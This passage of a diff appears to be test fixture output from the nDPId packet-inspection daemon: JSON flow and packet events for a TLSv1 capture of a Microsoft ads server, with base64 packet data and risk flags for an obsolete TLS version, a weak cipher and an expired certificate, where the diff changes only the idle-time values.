-02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\/IsZAEZFgRjb3JwMRcwFQYKCZImiZPyLGQBGRYHcmVkbW9uZDEqMCgGA1UEAxMhTWljcm9zb2Z0IFNlY3VyZSBTZXJ2ZXIgQXV0aG9yaXR5MB4XDTExMTAyMTE2NDIwM1oXDTEzMTAyMDE2NDIwM1owggVRMQswCQYDVQQGEwJVUzEQMA4GA1UEBxMHUmVkbW9uZDESMBAGA1UEChMJTWljcm9zb2Z0MQwwCgYDVQQLEwNHRlMxHjAcBgNVBAMMFSoub2ZmaWNlYXBwcy5saXZlLmNvbTEUMBIGA1UEAwwLKi5tc2Fkcy5uZXQxGTAXBgNVBAMMECouYWRzMi5tc2Fkcy5uZXQxGDAWBgNVBAMMDyouc3RjLnMtbXNuLmNvbTEtMCsGA1UEAwwkY2RuLmRjMmZpbGVzLioubGl2ZWZpbGVzdG9yZS1pbnQuY29tMSAwHgYDVQQDDBdjZG4uKi5saXZlZmlsZXN0b3JlLmNvbTEoMCYGA1UEAwwfKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLmNvbTEsMCoGA1UEAwwjKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLWludC5jb20xLTArBgNVBAMMJCoubWFya2V0cGxhY2Uud2luZG93c21vYmlsZS1wZXJmLmNvbTEYMBYGA1UEAwwPKi5zdGoucy1tc24uY29tMRswGQYDVQQDExJhamF4Lm1pY3Jvc29mdC5jb20xJDAiBgNVBAMMGyoubWljcm9zb2Z0LXNicy1kb21haW5zLmNvbTETMBEGA1UEAwwKKi5saXZlLm5ldDESMBAGA1UEAwwJKi5tc24uY29tMRYwFAYDVQQDDA0qLm1zbi1pbnQuY29tMSMwIQYDVQQDDBoqLmYxZHMuc2hhcmVkLmxpdmUtaW50LmNvbTEdMBsGA1UEAwwUKi5mMWRzLndseHJzLWludC5jb20xHjAcBgNVBAMMFSouc2hhcmVkLmxpdmUtaW50LmNvbTEaMBgGA1UEAwwRKi5zaGFyZWQubGl2ZS5jb20xGDAWBgNVBAMMDyoubWljcm9zb2Z0LmNvbTETMBEGA1UEAwwKKi5saXZlLmNvbTEXMBUGA1UEAwwOKi5saXZlLWludC5jb20xFDASBgNVBAMMCyoud2x4cnMuY29tMRgwFgYDVQQDDA8qLndseHJzLWludC5jb20xFzAVBgNVBAMMDiouc3Qucy1tc24uY29tMRgwFgYDVQQDDA8qLnN0Yi5
zLW1zbi5jb20xKTAnBgNVBAMTIGltYWdlcy5tb3h5LndpbmRvd3NwaG9uZS1pbnQuY29tMRkwFwYDVQQDDBAqLndseHJzdS1pbnQuY29tMSwwKgYDVQQDEyNpbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUtaW50LmNvbTEoMCYGA1UEAxMfaW1hZ2VzLnBhcnRuZXIud2luZG93c3Bob25lLmNvbTEVMBMGA1UEAwwMKi5qcC5tc24uY29tMRswGQYDVQQDDBIqLmMzc2NzLmpwLm1zbi5jb20xGDAWBgNVBAMMDyouYXNwbmV0Y2RuLmNvbTEWMBQGA1UEAwwNKi5ob3RtYWlsLmNvbTEqMCgGA1UEAwwhKi5wYXJ0bmVyLWRmLndpbmRvd3NwaG9uZS1pbnQuY28="} -01101{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
-02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\/BAIwADALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMIIDowYDVR0RBIIDmjCCA5aCDyoudm8ubXNlY25kLm5ldIIVKi5vZmZpY2VhcHBzLmxpdmUuY29tggsqLm1zYWRzLm5ldIIQKi5hZHMyLm1zYWRzLm5ldIIPKi5zdGMucy1tc24uY29tgiRjZG4uZGMyZmlsZXMuKi5saXZlZmlsZXN0b3JlLWludC5jb22CF2Nkbi4qLmxpdmVmaWxlc3RvcmUuY29tgh8qLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUuY29tgiMqLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUtaW50LmNvbYIkKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLXBlcmYuY29tgg8qLnN0ai5zLW1zbi5jb22CEmFqYXgubWljcm9zb2Z0LmNvbYIbKi5taWNyb3NvZnQtc2JzLWRvbWFpbnMuY29tggoqLmxpdmUubmV0ggkqLm1zbi5jb22CDSoubXNuLWludC5jb22CGiouZjFkcy5zaGFyZWQubGl2ZS1pbnQuY29tghQqLmYxZHMud2x4cnMtaW50LmNvbYIVKi5zaGFyZWQubGl2ZS1pbnQuY29tghEqLnNoYXJlZC5saXZlLmNvbYIPKi5taWNyb3NvZnQuY29tggoqLmxpdmUuY29tgg4qLmxpdmUtaW50LmNvbYILKi53bHhycy5jb22CDyoud2x4cnMtaW50LmNvbYIOKi5zdC5zLW1zbi5jb22CDyouc3RiLnMtbXNuLm
NvbYIgaW1hZ2VzLm1veHkud2luZG93c3Bob25lLWludC5jb22CECoud2x4cnN1LWludC5jb22CI2ltYWdlcy5wYXJ0bmVyLndpbmRvd3NwaG9uZS1pbnQuY29tgh9pbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUuY29tggwqLmpwLm1zbi5jb22CEiouYzNzY3MuanAubXNuLmNvbYIPKi5hc3BuZXRjZG4uY29tgg0qLmhvdG1haWwuY29tgiEqLnBhcnRuZXItZGYud2luZG93c3Bob25lLWludC5jb22CCyoucy1tc24uY29tgg4qLmxpdmUtaW50Lm5ldIIWKi53aW5kb3dzcGhvbmUtaW50LmNvbYISKi53aW5kb3dzcGhvbmUuY29tgiEqLnBhcnRuZXI="} -03337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, 
CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} -01038{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\/IsZAEZFgRjb3JwMRcwFQYKCZImiZPyLGQBGRYHcmVkbW9uZDEqMCgGA1UEAxMhTWljcm9zb2Z0IFNlY3VyZSBTZXJ2ZXIgQXV0aG9yaXR5MB4XDTExMTAyMTE2NDIwM1oXDTEzMTAyMDE2NDIwM1owggVRMQswCQYDVQQGEwJVUzEQMA4GA1UEBxMHUmVkbW9uZDESMBAGA1UEChMJTWljcm9zb2Z0MQwwCgYDVQQLEwNHRlMxHjAcBgNVBAMMFSoub2ZmaWNlYXBwcy5saXZlLmNvbTEUMBIGA1UEAwwLKi5tc2Fkcy5uZXQxGTAXBgNVBAMMECouYWRzMi5tc2Fkcy5uZXQxGDAWBgNVBAMMDyouc3RjLnMtbXNuLmNvbTEtMCsGA1UEAwwkY2RuLmRjMmZpbGVzLioubGl2ZWZpbGVzdG9yZS1pbnQuY29tMSAwHgYDVQQDDBdjZG4uKi5saXZlZmlsZXN0b3JlLmNvbTEoMCYGA1UEAwwfKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLmNvbTEsMCoGA1UEAwwjKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLWludC5jb20xLTArBgNVBAMMJCoubWFya2V0cGxhY2Uud2luZG93c21vYmlsZS1wZXJmLmNvbTEYMBYGA1UEAwwPKi5zdGoucy1tc24uY29tMRswGQYDVQQDExJhamF4Lm1pY3Jvc29mdC5jb20xJDAiBgNVBAMMGyoubWljcm9zb2Z0LXNicy1kb21haW5zLmNvbTETMBEGA1UEAwwKKi5saXZlLm5ldDESMBAGA1UEAwwJKi5tc24uY29tMRYwFAYDVQQDDA0qLm1zbi1pbnQuY29tMSMwIQYDVQQDDBoqLmYxZHMuc2hhcmVkLmxpdmUtaW50LmNvbTEdMBsGA1UEAwwUKi5mMWRzLndseHJzLWludC5jb20xHjAcBgNVBAMMFSouc2hhcmVkLmxpdmUtaW50LmNvbTEaMBgGA1UEAwwRKi5zaGFyZWQubGl2ZS5jb20xGDAWBgNVBAMMDyoubWljcm9zb2Z0LmNvbTETMBEGA1UEAwwKKi5saXZlLmNvbTEXMBUGA1UEAwwOKi5saXZlLWludC5jb20xFDASBgNVBAMMCyoud2x4cnMuY29tMRgwFgYDVQQDDA8qLndseHJzLWludC5jb20xFzAVBgNVBAMMDiouc3Qucy1tc24uY29tMRgwFgYDVQQDDA8qLnN0Yi5
zLW1zbi5jb20xKTAnBgNVBAMTIGltYWdlcy5tb3h5LndpbmRvd3NwaG9uZS1pbnQuY29tMRkwFwYDVQQDDBAqLndseHJzdS1pbnQuY29tMSwwKgYDVQQDEyNpbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUtaW50LmNvbTEoMCYGA1UEAxMfaW1hZ2VzLnBhcnRuZXIud2luZG93c3Bob25lLmNvbTEVMBMGA1UEAwwMKi5qcC5tc24uY29tMRswGQYDVQQDDBIqLmMzc2NzLmpwLm1zbi5jb20xGDAWBgNVBAMMDyouYXNwbmV0Y2RuLmNvbTEWMBQGA1UEAwwNKi5ob3RtYWlsLmNvbTEqMCgGA1UEAwwhKi5wYXJ0bmVyLWRmLndpbmRvd3NwaG9uZS1pbnQuY28="} +01101{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
+02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\/BAIwADALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMIIDowYDVR0RBIIDmjCCA5aCDyoudm8ubXNlY25kLm5ldIIVKi5vZmZpY2VhcHBzLmxpdmUuY29tggsqLm1zYWRzLm5ldIIQKi5hZHMyLm1zYWRzLm5ldIIPKi5zdGMucy1tc24uY29tgiRjZG4uZGMyZmlsZXMuKi5saXZlZmlsZXN0b3JlLWludC5jb22CF2Nkbi4qLmxpdmVmaWxlc3RvcmUuY29tgh8qLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUuY29tgiMqLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUtaW50LmNvbYIkKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLXBlcmYuY29tgg8qLnN0ai5zLW1zbi5jb22CEmFqYXgubWljcm9zb2Z0LmNvbYIbKi5taWNyb3NvZnQtc2JzLWRvbWFpbnMuY29tggoqLmxpdmUubmV0ggkqLm1zbi5jb22CDSoubXNuLWludC5jb22CGiouZjFkcy5zaGFyZWQubGl2ZS1pbnQuY29tghQqLmYxZHMud2x4cnMtaW50LmNvbYIVKi5zaGFyZWQubGl2ZS1pbnQuY29tghEqLnNoYXJlZC5saXZlLmNvbYIPKi5taWNyb3NvZnQuY29tggoqLmxpdmUuY29tgg4qLmxpdmUtaW50LmNvbYILKi53bHhycy5jb22CDyoud2x4cnMtaW50LmNvbYIOKi5zdC5zLW1zbi5jb22CDyouc3RiLnMtbXNuLm
NvbYIgaW1hZ2VzLm1veHkud2luZG93c3Bob25lLWludC5jb22CECoud2x4cnN1LWludC5jb22CI2ltYWdlcy5wYXJ0bmVyLndpbmRvd3NwaG9uZS1pbnQuY29tgh9pbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUuY29tggwqLmpwLm1zbi5jb22CEiouYzNzY3MuanAubXNuLmNvbYIPKi5hc3BuZXRjZG4uY29tgg0qLmhvdG1haWwuY29tgiEqLnBhcnRuZXItZGYud2luZG93c3Bob25lLWludC5jb22CCyoucy1tc24uY29tgg4qLmxpdmUtaW50Lm5ldIIWKi53aW5kb3dzcGhvbmUtaW50LmNvbYISKi53aW5kb3dzcGhvbmUuY29tgiEqLnBhcnRuZXI="} +03337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, 